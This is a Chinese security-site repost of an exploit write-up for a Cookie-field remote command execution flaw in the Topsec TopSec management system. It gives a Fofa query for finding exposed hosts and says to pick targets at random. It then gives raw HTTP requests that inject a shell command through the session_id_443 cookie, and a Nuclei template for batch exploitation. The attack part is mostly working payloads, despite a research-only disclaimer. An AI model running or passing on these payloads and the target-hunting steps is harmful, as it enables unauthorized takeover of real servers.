天融信TOPSEC Cookie 远程命令执行漏洞

admin
admin
admin
139025
文章
114
评论
2024年1月14日22:36:50评论293 views字数 1396阅读4分39秒阅读模式

天融信TOPSEC Cookie 远程命令执行漏洞

天融信TOPSEC Cookie 远程命令执行漏洞
天融信TOPSEC Cookie 远程命令执行漏洞

漏洞简介

天融信TOPSEC Cookie 远程命令执行漏洞
天融信TOPSEC Cookie 远程命令执行漏洞

天融信TopSec安全管理系统 Cookie字段存在远程命令执行漏洞,通过该漏洞,攻击者可通过构造恶意字符串,执行任意系统命令,从而拿下服务器权限。

天融信TOPSEC Cookie 远程命令执行漏洞
天融信TOPSEC Cookie 远程命令执行漏洞

漏洞复现

天融信TOPSEC Cookie 远程命令执行漏洞
天融信TOPSEC Cookie 远程命令执行漏洞

步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

# Fofa搜索语法title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容...

执行命令

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: ipCookie: session_id_443=1|echo `id`  > /www/htdocs/site/image/qqqq.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

天融信TOPSEC Cookie 远程命令执行漏洞

查看结果

GET /site/image/qqqq.txt HTTP/1.1Host:IPCookie: session_id_443=1User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

天融信TOPSEC Cookie 远程命令执行漏洞

天融信TOPSEC Cookie 远程命令执行漏洞
天融信TOPSEC Cookie 远程命令执行漏洞

批量脚本

天融信TOPSEC Cookie 远程命令执行漏洞
天融信TOPSEC Cookie 远程命令执行漏洞
id: template-idinfo:  name: test_qrcode_b-rce  author: kali  severity: info  description: description  reference:    - https://  tags: tagsrequests:  - raw:      # this request will be sent to {{Hostname}} to get the token      - |        GET /cgi/maincgi.cgi?Url=aa HTTP/1.1        Host: {{Hostname}}        Cookie: session_id_443=1|echo `id`  > /www/htdocs/site/image/qqqq.txt;        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36      # This request will be sent instead to https://api.target.com:443 to verify the token validity      - |        @Host: {{Hostname}}        GET /site/image/qqqq.txt HTTP/1.1        Host: {{Hostname}}        Cookie: session_id_443=1        User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36    matchers:      - type: word        part: body        words:          - 'uid'        condition: or

原文始发于微信公众号(揽月安全团队):天融信TOPSEC Cookie 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月14日22:36:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   天融信TOPSEC Cookie 远程命令执行漏洞https://cn-sec.com/archives/2385201.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息